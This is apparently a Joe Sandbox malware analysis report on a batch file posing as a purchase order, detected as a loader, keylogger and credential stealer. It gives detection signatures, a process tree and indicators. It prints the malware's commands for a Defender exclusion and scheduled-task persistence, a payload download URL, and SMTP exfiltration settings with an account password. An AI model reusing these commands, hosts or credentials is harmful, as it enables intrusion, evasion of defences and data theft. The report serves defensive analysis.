Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#5_Tower_049.bat

Overview

General Information

Sample name:PO#5_Tower_049.bat
Analysis ID:1583899
MD5:0d8e4971994af9eae92707005997ad14
SHA1:3473ecb4f88d6ceb8ab7e085bbd7f7a2bc199aea
SHA256:6c76b0654fd88351436c641c0c81abb399a8f37702e9f8375d71283a75274f6b
Tags:batuser-abuse_ch
Infos:

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Drops large PE files
Found large BAT file
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 4816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_Tower_049.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 4404 cmdline: extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 2788 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: EE363121466EE051042410AFFFEA28EF)
      • cmd.exe (PID: 5908 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rpkhzpuO.pif (PID: 6480 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
        • Trading_AIBot.exe (PID: 2920 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 1600 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 3692 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 5144 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • apihost.exe (PID: 1400 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 1EC1BD626F8EA04635D66113E34C4733)
        • Microsofts.exe (PID: 6004 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)
  • Oupzhkpr.PIF (PID: 4824 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: EE363121466EE051042410AFFFEA28EF)
    • cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rpkhzpuO.pif (PID: 432 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Oupzhkpr.PIF (PID: 6252 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: EE363121466EE051042410AFFFEA28EF)
    • cmd.exe (PID: 2232 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rpkhzpuO.pif (PID: 4464 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
{"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\user\AppData\Local\Temp\Microsofts.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x101cd:$a1: get_encryptedPassword
        • 0x10509:$a2: get_encryptedUsername
        • 0xff5a:$a3: get_timePasswordChanged
        • 0x1007b:$a4: get_passwordField
        • 0x101e3:$a5: set_encryptedPassword
        • 0x11bb3:$a7: get_logins
        • 0x11864:$a8: GetOutlookPasswords
        • 0x11642:$a9: StartKeylogger
        • 0x11b03:$a10: KeyLoggerEventArgs
        • 0x1169f:$a11: KeyLoggerEventArgsEventHandler
        C:\Users\user\AppData\Local\Temp\Microsofts.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          SourceRuleDescriptionAuthorStrings
          00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000009.00000002.3277651726.0000000002EBF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                    Click to see the 39 entries
                    SourceRuleDescriptionAuthorStrings
                    23.2.rpkhzpuO.pif.30640000.12.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      23.2.rpkhzpuO.pif.30640f08.11.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        7.2.rpkhzpuO.pif.400000.2.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                        • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                        • 0x1fdd0:$s5: delete[]
                        • 0x1f288:$s6: constructor or from DllMain.
                        7.2.rpkhzpuO.pif.257b4e5e.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          18.2.rpkhzpuO.pif.1ebd3d90.9.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            Click to see the 99 entries

                            System Summary

                            barindex
                            Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 2788, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 2788, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 6480, ProcessName: rpkhzpuO.pif
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 2788, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 2788, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Oupzhkpr.PIF" , ParentImage: C:\Users\Public\Libraries\Oupzhkpr.PIF, ParentProcessId: 4824, ParentProcessName: Oupzhkpr.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 1784, ProcessName: cmd.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2920, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1600, ProcessName: powershell.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 2788, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
                            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 2788, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 6480, ProcessName: rpkhzpuO.pif
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2920, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1600, ProcessName: powershell.exe
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 2920, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2920, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5144, ProcessName: schtasks.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2920, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5144, ProcessName: schtasks.exe
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2920, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1600, ProcessName: powershell.exe
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-03T20:39:58.523792+010020283713Unknown Traffic192.168.2.54970541.185.8.252443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-03T20:40:15.972518+010028032742Potentially Bad Traffic192.168.2.549706158.101.44.24280TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: https://lwaziacademy.com/wps/200_OupzhkprnvwAvira URL Cloud: Label: malware
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeAvira: detection malicious, Label: TR/Dropper.Gen
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAvira: detection malicious, Label: HEUR/AGEN.1326043
                            Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1326043
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                            Source: PO#5_Tower_049.batMalware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFReversingLabs: Detection: 82%
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeReversingLabs: Detection: 79%
                            Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 82%
                            Source: PO#5_Tower_049.batReversingLabs: Detection: 44%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeJoe Sandbox ML: detected

                            Location Tracking

                            barindex
                            Source: unknownDNS query: name: reallyfreegeoip.org

                            Compliance

                            barindex
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 7.2.rpkhzpuO.pif.400000.2.unpack
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 18.2.rpkhzpuO.pif.400000.2.unpack
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 23.2.rpkhzpuO.pif.400000.2.unpack
                            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.0
                            Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.5:49705 version: TLS 1.2
                            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp
                            Source: Binary string: easinvoker.pdb source: x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2104269976.000000007F340000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.0000000020676000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000001.2160139244.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2359070635.00000000008E0000.00000040.00000400.00020000.00000000.sdmp
                            Source: Binary string: _.pdb source: rpkhzpuO.pif, 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2220114157.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2230537211.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2213918135.000000001BAE6000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2319463942.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2228595916.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rpkhzpuO.pif, 00000017.00000002.2389107729.000000002C1DA000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2104269976.000000007F340000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055747965.00000000216A2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055747965.00000000216D1000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000003.2156504119.000000000081D000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000003.2156504119.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.0000000020676000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000001.2160139244.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244287414.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244287414.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2359070635.00000000008E0000.00000040.00000400.00020000.00000000.sdmp
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_027C58B4
